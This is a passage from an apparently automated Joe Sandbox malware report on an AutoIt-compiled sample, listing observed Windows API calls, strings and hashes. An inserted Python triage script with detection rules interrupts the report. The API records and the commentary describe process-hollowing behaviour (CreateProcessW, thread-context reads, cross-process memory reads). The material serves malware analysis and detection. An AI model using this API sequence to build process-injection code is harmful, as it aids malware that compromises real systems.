                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                        • API String ID: 1586453840-614718249
                                                                                                        • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                        • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShow
                                                                                                        • String ID: AutoIt v3$edit
                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                          • Part of subcall function 0454E2B8: Sleep.KERNELBASE(000001F4), ref: 0454E2C9
                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0454E52E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileSleep
                                                                                                        • String ID: 5PK3SF4HHMGJQIH57SYAMY
                                                                                                        • API String ID: 2694422964-1648254294
                                                                                                        • Opcode ID: 1a4e543e86c309f7bc600c2a9bfe54b6018ce2ecd0fd16e07a12f570267b7582
                                                                                                        • Instruction ID: e336c4f5b9bef61c53bbee68544db14d6c4da68f59de5e524c94f8719e82968a
                                                                                                        • Opcode Fuzzy Hash: 1a4e543e86c309f7bc600c2a9bfe54b6018ce2ecd0fd16e07a12f570267b7582
                                                                                                        • Instruction Fuzzy Hash: FC61D430D04248DBEF11DBE4D845BEEBB75AF59304F044199E208BB2C0D7BA1B44CBA6
                                                                                                        APIs
                                                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                        • String ID: Line:
                                                                                                        • API String ID: 1874344091-1585850449
                                                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$OpenQueryValue
                                                                                                        • String ID: Control Panel\Mouse
                                                                                                        • API String ID: 1607946009-824357125
                                                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170942423-0
                                                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 0-3837949563
                                                                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 2429186680-3837949563
                                                                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0454DA73
                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0454DB09
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0454DB2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 2438371351-0
                                                                                                        • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                        • Instruction ID: 05699d37a306a8334bca2d5cded8b66a6b3e0302f996a52e5939a3ace17055b3
                                                                                                        • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                        • Instruction Fuzzy Hash: 4A620C30A14218DBEB24CFA4C840BDEB376FF98304F1095A9D10DEB294E7799E85DB59
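The API blocks in these records (CreateFileW at 0454E52E, the Control Panel\Mouse registry query at 0040F267, and CreateProcessW followed by Wow64GetThreadContext and ReadProcessMemory at 0454DA73-0454DB2B) are what an analyst reads by hand to decide which functions matter. The Python script below is an added example, not part of this Joe Sandbox report, of the sandbox's tooling or of the sample: it parses lines in the report's "Name.MODULE(args), ref: ADDR" format, separates direct calls from "Part of subcall function" entries, and flags API combinations that together indicate a behaviour. The rule names, the grouping of APIs into rules, the function labels (taken from the first call's address) and the `triage` helper are assumptions made for this example; the sample lines are copied from the records above.

```python
"""Parse Joe Sandbox 'APIs' blocks and flag tell-tale API combinations.

Added example for this report; not part of Joe Sandbox or of the sample.
Report lines look like
    Name.MODULE(args), ref: ADDR                                  (direct call)
    Part of subcall function CALLEE: Name.MODULE(args), ref: ADDR (call by a callee)
LIBCMT entries ('_wcsncpy.LIBCMT ref: 00401C41') carry no argument list.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str            # module the sandbox resolved the call to (KERNELBASE, USER32, ...)
    args: Tuple[str, ...]  # argument values as printed; '?' means not recovered
    ref: int               # address of the call instruction
    via_subcall: Optional[int]  # callee that really issues the call, None for a direct call


def parse_api_lines(lines: List[str]) -> List[ApiCall]:
    """Parse the bullet lines of one 'APIs' block; lines that do not match are skipped."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if not m:
            continue
        caller = m.group("caller")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=tuple(a for a in (m.group("args") or "").split(",") if a),
            ref=int(m.group("ref"), 16),
            via_subcall=int(caller, 16) if caller else None,
        ))
    return calls


# A rule is a sequence of API groups; a record matches when at least one API from
# every group is called directly by the function. Names and groupings are assumptions
# made for this example, not Joe Sandbox signatures.
RULES: Dict[str, Tuple[Set[str], ...]] = {
    # create a child process, fetch a thread context, then read or write its memory:
    # the shape of process hollowing / RunPE-style injection
    "process_hollowing_candidate": (
        {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
        {"GetThreadContext", "Wow64GetThreadContext"},
        {"ReadProcessMemory", "WriteProcessMemory", "NtUnmapViewOfSection",
         "SetThreadContext", "Wow64SetThreadContext", "ResumeThread"},
    ),
    # open a file, allocate a buffer, read the file into it: a loader stage
    "file_read_into_memory": (
        {"CreateFileW", "CreateFileA"},
        {"VirtualAlloc", "VirtualAllocEx"},
        {"ReadFile"},
    ),
}


def match_rules(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Return the names of all rules satisfied by this record's set of API names."""
    names = {c.name for c in calls if include_subcalls or c.via_subcall is None}
    return [rule for rule, groups in RULES.items() if all(names & g for g in groups)]


def triage(records: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Map each function label to the rules it matches; functions with no hit are omitted."""
    hits = {label: match_rules(parse_api_lines(lines)) for label, lines in records.items()}
    return {label: rules for label, rules in hits.items() if rules}


# API lines copied from three 'APIs' blocks of this report, keyed by the address of the
# first call (labels chosen here; the report does not name the functions).
REPORT_RECORDS: Dict[str, List[str]] = {
    "0454E52E": [
        "• Part of subcall function 0454E2B8: Sleep.KERNELBASE(000001F4), ref: 0454E2C9",
        "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0454E52E",
    ],
    "0040F267": [
        "• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267",
        "• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E",
        "• RegCloseKey.KERNELBASE(?), ref: 0040F2B5",
        "• RegCloseKey.ADVAPI32(?), ref: 0040F2C9",
    ],
    "0454DA73": [
        "• CreateProcessW.KERNELBASE(?,00000000), ref: 0454DA73",
        "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0454DB09",  # 00010007 = CONTEXT_FULL (x86)
        "• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0454DB2B",
    ],
}

if __name__ == "__main__":
    for label, rules in triage(REPORT_RECORDS).items():
        print(f"{label}: {', '.join(rules)}")
```

Only the 0454DA73 record fires: CreateProcessW, a thread-context read and a cross-process memory read in one function is the sequence that precedes writing a new image into a child. Two details from the report's own arguments are worth noting when reading such a hit: the ContextFlags value 00010007 passed to Wow64GetThreadContext is CONTEXT_FULL for x86 (CONTEXT_i386 0x10000 | CONTROL | INTEGER | SEGMENTS), and the 00000004 passed to ReadProcessMemory is nSize, so this is a single 4-byte read. The CreateFileW record does not match because its 'APIs' block lists only the calls the sandbox observed; the VirtualAlloc and ReadFile blocks in that function's control-flow graph were not reached in this run, so a rule over observed calls alone stays silent, which is the caveat to keep in mind when triaging from dynamic API lists.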
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: Error:
                                                                                                        • API String ID: 4104443479-232661952
                                                                                                        • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                        • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                        APIs
                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                        • String ID: X$pWH
                                                                                                        • API String ID: 85490731-941433119
                                                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                        • String ID: @EXITCODE
                                                                                                        • API String ID: 2734553683-3436989551
                                                                                                        • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                        • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1794320848-0
                                                                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                        APIs
                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                        Memory Dump Source
